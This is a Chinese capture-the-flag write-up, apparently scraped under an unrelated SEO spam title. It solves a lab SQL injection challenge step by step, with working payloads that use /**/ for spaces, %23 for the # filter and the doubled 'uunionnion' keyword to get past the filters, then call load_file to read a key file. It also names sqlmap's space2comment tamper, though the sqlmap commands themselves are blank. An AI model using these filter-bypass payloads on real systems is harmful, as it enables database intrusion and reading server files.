怎樣做網站首頁圖片變換seo研究中心培訓機構
url:http://192.168.154.253:81/? #打開http://XXX:81/,XXX為靶機的ip地址
審題
1、打開題目看到有一個提示,此題目需要通過SQL注入漏洞讀取/tmp/360/key文件,key在這個文件中
2、開始答題
發(fā)現這里url中有一個id的參數,并且給出了當前所執(zhí)行的sql語句
第一步:判斷注入點
1、?id=1' |
2、?id=1'and'1'='1 |
第二步:判斷語句模板
1、使用 order by 判斷語句模板列數 發(fā)現語句在執(zhí)行中過濾了空格還過濾了“#” 執(zhí)行失敗: ?id=1'and'1'='1'order by 3# ?id=1'and'1'='1'order+by+3# |
執(zhí)行成功: ?id=1')and'1'='1'order/**/by/**/3%23 解釋: ?id=1')and'1'='1'order/**/by/**/3%23
|
2、判斷出語句模板有4個字段 回顯正常: ?id=1')and'1'='1'order/**/by/**/4%23? #執(zhí)行 order by 4 的時候回顯正常 |
回顯不正常: ?id=1')and'1'='1'order/**/by/**/5%23? #執(zhí)行 order by 5 的時候回顯不正常 |
第三步:找回顯點
回顯不正常: ?id=1')and'1'='2'union/**/select/**/1,2,3,4%23 思路:使用 and 1=2 報錯找回顯點 |
回顯正常: ?id=1')and'1'='2'uunionnion/**/select/**/1,2,3,4%23 思路:由于過濾了union,所以這里使用雙寫的方式經行過濾繞過,并且判斷出回顯點有3個(語句模板中的2,3,4位置均為回顯點) |
第四步:拿到flag
執(zhí)行成功: ?id=1')and'1'='2'uunionnion/**/select/**/1,database(),load_file('/tmp/360/key'),user()%23 解釋: —— 1')and'1'='2'union/**/select/**/1,database(),load_file('/tmp/360/key'),user()#')
|
擴展:使用sqlmap一把梭哈
1、由于前面判斷出了此題注入點存在過濾空格的情況,所以在使用sqlmap的時候需要指定腳本(用注釋/**/替換空格字符' ':--tamper "space2comment.py")運行 命令:
|
命令:
|
2、獲取到flag